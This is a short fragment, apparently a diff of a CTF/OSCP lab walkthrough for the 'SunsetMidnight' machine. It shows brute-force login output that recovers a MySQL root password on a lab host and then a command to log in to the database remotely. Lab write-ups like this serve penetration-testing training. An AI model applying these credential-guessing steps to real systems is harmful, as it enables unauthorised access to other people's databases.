0xASTRA/CTF-Walkthroughs/OSCP-LABS/Proving Grounds Play/INTERMEDIATE/SunsetMidnight.md

 [-] 192.168.164.88:3306   - 192.168.164.88:3306 - LOGIN FAILED: root:password (Incorrect: Access denied for user 'root'@'192.168.45.5' (using password: YES)
 [+] 192.168.164.88:3306   - 192.168.164.88:3306 - Success: 'root:robert'
 ```
-// Now we got the password for the user "root" and will login to the mysql database
+// Now we got the password for the user "root" and will login to the mysql database remotely
 ```
 ┌──(root㉿kali)-[/home/astra]
 └─# mysql -h 192.168.164.88 -p